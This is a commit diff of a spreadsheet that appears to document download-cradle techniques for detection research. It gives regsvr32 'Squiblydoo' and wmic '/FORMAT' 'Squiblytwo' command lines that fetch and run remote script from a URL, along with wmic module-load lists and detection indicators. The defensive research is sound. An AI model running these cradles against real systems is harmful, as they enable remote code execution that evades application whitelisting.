<commit_message>
small change to results
</commit_message>
<xml_diff>
--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -9114,11 +9114,6 @@
     </r>
   </si>
   <si>
-    <t>Squiglytwo - wmic.exe as a download cradle (not specifically powershell)
-wmic.exe &lt;command&gt; /FORMAT:$Url
-e.g wmic.exe os get /FORMAT:"http://domain.com/test.xsl"</t>
-  </si>
-  <si>
     <t>GET:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)</t>
   </si>
   <si>
@@ -9468,6 +9463,63 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblydoo - regsvr32.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiblydoo - regsvr32.exe as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblytwo - wmic.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+cmd /d wmic.exe os get /FORMAT:"$Url"
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiblytwo - wmic.exe as a download cradle (not specifically powershell)
+wmic.exe &lt;command&gt; /FORMAT:$Url
+e.g wmic.exe os get /FORMAT:"http://domain.com/test.xsl"</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t>wmic.exe loads additional modules:</t>
@@ -9485,145 +9537,7 @@
     </r>
     <r>
       <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
-Application Experience Program Cache - C:\Windows\System32\aepic.dll
-Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.14.17613.18039-0\MpClient.dll
-Cloud API user mode API - C:\Windows\System32\cldapi.dll
-Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
-Crypto API32 - C:\Windows\System32\crypt32.dll
-Crypto Network Related API - C:\Windows\System32\cryptnet.dll
-DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Data Protection API - C:\Windows\System32\dpapi.dll
-EDP util - C:\Windows\System32\edputil.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Filter Library - C:\Windows\System32\fltLib.dll
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
-Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
-Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
-Microsoft Property System - C:\Windows\System32\propsys.dll
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
-Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
-NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
-OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-Software Licensing Client Dll - C:\Windows\System32\slc.dll
-Software Licensing Client Dll - C:\Windows\System32\sppc.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-Web Transfer Protocols API - C:\Windows\System32\webio.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="8"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows NT MARTA provider - C:\Windows\System32\ntmarta.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
-Windows Shell Common Dll - C:\Windows\System32\shell32.dll
-Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>wmic.exe loads additional modules:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
@@ -9645,21 +9559,22 @@
     <r>
       <rPr>
         <b/>
-        <sz val="9"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Microsoft ® JScript - C:\Windows\System32\jscript.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
 Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="9"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+NT Layer DLL - C:\Windows\System32\ntdll.dll
 Network Explorer - C:\Windows\System32\networkexplorer.dll
 On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
 Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
@@ -9672,7 +9587,7 @@
     <r>
       <rPr>
         <b/>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
@@ -9680,14 +9595,31 @@
     </r>
     <r>
       <rPr>
-        <sz val="9"/>
+        <sz val="10"/>
         <color theme="1"/>
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t xml:space="preserve">
 Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
-Windows Setup API - C:\Windows\System32\setupapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Setup API - C:\Windows\System32\setupapi.dll
 Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
     </r>
   </si>
@@ -9819,7 +9751,24 @@
       </rPr>
       <t xml:space="preserve">
 Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
 Windows Setup API - C:\Windows\System32\setupapi.dll
 Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
     </r>
@@ -9830,6 +9779,127 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>wmic.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Application Compatibility Client Library - C:\Windows\System32\apphelp.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Security Support Provider Interface - C:\Windows\System32\secur32.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+Win32 LDAP API DLL - C:\Windows\System32\Wldap32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows Setup API - C:\Windows\System32\setupapi.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Control for whitelist ran:
+wmic /node:192.168.7.159 /User:Administrator /Password:&lt;Password&gt; os get
+wmic os get</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
         <rFont val="Calibri"/>
         <family val="2"/>
       </rPr>
@@ -9843,62 +9913,35 @@
         <family val="2"/>
         <scheme val="minor"/>
       </rPr>
-      <t xml:space="preserve"> Best detection via commandline and process chains
-wmic.exe connecting out to the internet is a good indicator.
-Wmic.exe also loads wininet.dll and winhttp.dll across all versions I tested.</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>Squiblydoo - regsvr32.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>Squiblydoo - wmic.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-cmd /d wmic.exe os get /FORMAT:"$Url"
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <t>Squiblydoo - regsvr32.exe as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll</t>
+      <t xml:space="preserve"> Best detection via commandline and process chains or wmic.exe connecting out to the internet.
+Wmic.exe process with "*format*" as command line
+Wmic.exe loading jscript.dll - Wmic.exe also loads winhttp.dll across all versions I tested. I found  vbscript.dll loaded in my control.
+wmic.exe writes:
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Network:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> User-Agent is very noisy so traditional content based detection appears most appropriate.</t>
+    </r>
   </si>
 </sst>
 </file>
@@ -12209,13 +12252,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
       <c r="C2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
       <c r="D2" s="43" t="s">
-        <v>242</v>
+        <v>236</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="20" customHeight="1">
@@ -12223,10 +12266,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>226</v>
+        <v>225</v>
       </c>
       <c r="D3" s="42" t="s">
         <v>88</v>
@@ -12279,7 +12322,7 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>235</v>
+        <v>234</v>
       </c>
       <c r="C7" s="47" t="s">
         <v>128</v>
@@ -12326,9 +12369,9 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:E9"/>
   <sheetViews>
-    <sheetView topLeftCell="A2" workbookViewId="0">
+    <sheetView topLeftCell="A6" workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight"/>
+      <selection pane="topRight" activeCell="C8" sqref="C8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12358,13 +12401,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
       <c r="C2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
       <c r="D2" s="43" t="s">
-        <v>224</v>
+        <v>238</v>
       </c>
     </row>
     <row r="3" spans="1:5" ht="20" customHeight="1">
@@ -12372,10 +12415,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>233</v>
+        <v>232</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>225</v>
+        <v>224</v>
       </c>
       <c r="D3" s="42" t="s">
         <v>88</v>
@@ -12400,13 +12443,13 @@
         <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
     </row>
     <row r="6" spans="1:5" ht="112">
@@ -12414,13 +12457,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
       <c r="C6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
       <c r="D6" s="43" t="s">
-        <v>229</v>
+        <v>228</v>
       </c>
     </row>
     <row r="7" spans="1:5" ht="409" customHeight="1">
@@ -12428,16 +12471,16 @@
         <v>8</v>
       </c>
       <c r="B7" s="47" t="s">
-        <v>236</v>
+        <v>239</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>237</v>
+        <v>241</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>238</v>
+        <v>240</v>
       </c>
       <c r="E7" t="s">
-        <v>230</v>
+        <v>229</v>
       </c>
     </row>
     <row r="8" spans="1:5" ht="80">
@@ -12445,13 +12488,13 @@
         <v>65</v>
       </c>
       <c r="B8" s="43" t="s">
+        <v>230</v>
+      </c>
+      <c r="C8" s="43" t="s">
+        <v>227</v>
+      </c>
+      <c r="D8" s="43" t="s">
         <v>231</v>
-      </c>
-      <c r="C8" s="43" t="s">
-        <v>228</v>
-      </c>
-      <c r="D8" s="43" t="s">
-        <v>232</v>
       </c>
     </row>
     <row r="9" spans="1:5">
@@ -12629,7 +12672,7 @@
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <pane ySplit="1" topLeftCell="A23" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="A30" sqref="A30"/>
+      <selection pane="bottomLeft" activeCell="B33" sqref="B33"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12825,7 +12868,7 @@
     </row>
     <row r="28" spans="1:2" ht="96">
       <c r="A28" s="36" t="s">
-        <v>234</v>
+        <v>233</v>
       </c>
       <c r="B28" s="36" t="s">
         <v>124</v>
@@ -12837,7 +12880,7 @@
     </row>
     <row r="30" spans="1:2" ht="48">
       <c r="A30" s="36" t="s">
-        <v>240</v>
+        <v>235</v>
       </c>
       <c r="B30" s="36" t="s">
         <v>92</v>
@@ -12847,12 +12890,12 @@
       <c r="A31" s="37"/>
       <c r="B31" s="38"/>
     </row>
-    <row r="32" spans="1:2" ht="48">
+    <row r="32" spans="1:2" ht="144">
       <c r="A32" s="36" t="s">
-        <v>241</v>
+        <v>237</v>
       </c>
       <c r="B32" s="36" t="s">
-        <v>239</v>
+        <v>242</v>
       </c>
     </row>
     <row r="33" spans="1:2" ht="7" customHeight="1">

</xml_diff>